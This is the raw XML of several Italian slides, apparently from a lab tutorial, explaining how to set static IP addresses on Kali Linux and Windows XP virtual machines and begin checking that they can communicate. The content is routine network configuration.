            <a:off x="10464478" y="5853172"/>
            <a:ext cx="6894461" cy="3204436"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="3204436" w="6894461">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6894461" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6894461" y="3204436"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3204436"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="-8964"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 19" id="19"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1337170" y="882169"/>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1.1 - CONFIGURAZIONE KALI LINUX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="AutoShape 20" id="20"/>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true" rot="0">
            <a:off x="8845815" y="1717230"/>
            <a:ext cx="2510721" cy="709279"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="709279" w="2510721">
                <a:moveTo>
                  <a:pt x="0" y="709279"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2510721" y="709279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2510721" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="709279"/>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22" id="22"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="5709765">
            <a:off x="14599154" y="3891426"/>
            <a:ext cx="1827200" cy="1763248"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 23" id="23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="11607435" y="1823259"/>
            <a:ext cx="2895966" cy="2914590"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2914590" w="2895966">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2895966" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2895966" y="2914589"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2914589"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId9"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 24" id="24"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="449352" y="1747059"/>
            <a:ext cx="4080718"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KALI LINUX</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7" id="27"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="737632" y="3125982"/>
            <a:ext cx="8859048" cy="6170418"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" marL="419956" indent="-209978" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2723"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Aprire un terminale di comando</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Avviamo Kali Linux e apriamo un terminale di comando.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="419956" indent="-209978" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2723"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Accedere al file di configurazione di rete</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Digitiamo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold Italics"/>
              </a:rPr>
              <a:t>sudo nano /etc/network/interfaces</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> e premiamo Invio. Questo comando ci permetterà di accedere al file che contiene la configurazione di rete della nostra macchina.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="419956" indent="-209978" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2723"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Modificare l'indirizzo IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Nel file che si aprirà, cerchiamo la riga che contiene l'indirizzo IP attuale. Modifichiamolo con l'indirizzo IP richiesto.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="419956" indent="-209978" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2723"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Salvare le modifiche</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Per salvare le modifiche, premiamo i tasti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Control + O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>, poi premiamo Invio e per chiudere l'editor nano, premiamo i tasti </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Control + X</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="419956" indent="-209978" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2723"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Semi-Bold"/>
              </a:rPr>
              <a:t>Riavviare la macchina</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Digitiamo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>reboot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> nel terminale e premiamo Invio per riavviare la macchina.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="419956" indent="-209978" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2723"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Semi-Bold"/>
              </a:rPr>
              <a:t>Verificare la modifica dell'indirizzo IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Dopo il riavvio, riapriamo un terminale di comando e digitiamo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Semi-Bold"/>
              </a:rPr>
              <a:t>ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>. Questo comando ci mostrerà la configurazione della rete attuale. Verifichiamo che l'indirizzo IP sia stato modificato correttamente.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2723"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="l"/>
  </p:transition>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46731"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5400000">
            <a:off x="1730615" y="1216352"/>
            <a:ext cx="7017191" cy="9723929"/>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764" t="0" r="-45764"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1607435" y="-1677349"/>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3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 17" id="17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="12753760" y="33924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18" id="18"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1337170" y="882169"/>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1.2 - CONFIGURAZIONE WINDOWS XP</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true" rot="0">
            <a:off x="8845815" y="1717230"/>
            <a:ext cx="2510721" cy="709279"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="709279" w="2510721">
                <a:moveTo>
                  <a:pt x="0" y="709279"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2510721" y="709279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2510721" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="709279"/>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1" id="21"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="5709765">
            <a:off x="14599154" y="3958101"/>
            <a:ext cx="1827200" cy="1763248"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 22" id="22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="11607435" y="1968906"/>
            <a:ext cx="4972527" cy="1814918"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1814918" w="4972527">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4972527" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4972527" y="1814917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1814917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId8"/>
            <a:stretch>
              <a:fillRect l="0" t="-82375" r="0" b="-126551"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 23" id="23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="10959355" y="5943252"/>
            <a:ext cx="7186283" cy="3528205"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="3528205" w="7186283">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7186282" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7186282" y="3528205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3528205"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId9"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 24" id="24"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="503510" y="1747059"/>
            <a:ext cx="3972401" cy="679450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="5599"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3999">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic Medium"/>
              </a:rPr>
              <a:t>IP windows xp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 25" id="25"/>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6" id="26"/>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7" id="27"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="737632" y="3125982"/>
            <a:ext cx="8406368" cy="5827518"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" marL="419956" indent="-209978" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2723"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Aprire  pannello di controllo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Avviamo Windows XP, clicchiamosul tasto start e apriamo il pannello di controllo.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="419956" indent="-209978" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2723"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Cliccare su Reti e connessioni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Clicchiamo su reti e connessioni, andiamo poi su connessioni di rete e clicchiamo connessione alla rete LAN.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="419956" indent="-209978" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2723"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Modificare l'indirizzo IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Nella configurazione che si aprirà clicchiamo su proprietà e poi su </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>protocollo internet TCP/IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>. Clicchiamo nuovamente su proprietà e possiamo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>poi modificare l’indirizzo IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>. Basterà poi cliccare su salva per salvare le modifiche.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="419956" indent="-209978" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2723"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Semi-Bold"/>
              </a:rPr>
              <a:t>Riavviare la macchina</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: RIavviamo la macchina attraverso il menù start.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="419956" indent="-209978" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2723"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Semi-Bold"/>
              </a:rPr>
              <a:t>Verificare la modifica dell'indirizzo IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Dopo il riavvio, apriamo un prompt dei comandi tramite il menù start. Nel terminale, digitiamo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Semi-Bold"/>
              </a:rPr>
              <a:t>ipconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1945">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>. Questo comando ci mostrerà la configurazione della rete attuale. Verifichiamo che l'indirizzo IP sia stato modificato correttamente.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2723"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="l"/>
  </p:transition>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1730615" y="1216352"/>
            <a:ext cx="7017191" cy="9723929"/>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5764" t="0" r="-45764"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5" id="15"/>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6" id="16"/>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1.3 - VERIFICA COMUNICAZIONE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968952">
            <a:off x="10294864" y="7738304"/>
            <a:ext cx="2884794" cy="814954"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="814954" w="2884794">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2884795" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2884795" y="814954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="814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0417335" y="4346309"/>
            <a:ext cx="7211672" cy="2695556"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2695556" w="7211672">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7211671" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7211671" y="2695556"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2695556"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId7"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 22" id="22"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="377246" y="1820616"/>
            <a:ext cx="11941947" cy="679450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="5599"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3999">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Bank Gothic Medium"/>
              </a:rPr>
              <a:t>Verifica comunicazione Tra Macchine</a:t>
            </a:r>
          </a:p>
        </p:txBody>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5" id="25"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1028700" y="2932783"/>
            <a:ext cx="7709853" cy="6325517"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" marL="482357" indent="-241178" lvl="1">
              <a:lnSpc>
                <a:spcPts val="3127"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2234">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Assicurarsi che entrambe le macchine siano avviate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2234">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Avviamo sia la macchina virtuale Kali Linux che quella Windows XP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="482357" indent="-241178" lvl="1">
              <a:lnSpc>
                <a:spcPts val="3127"/>
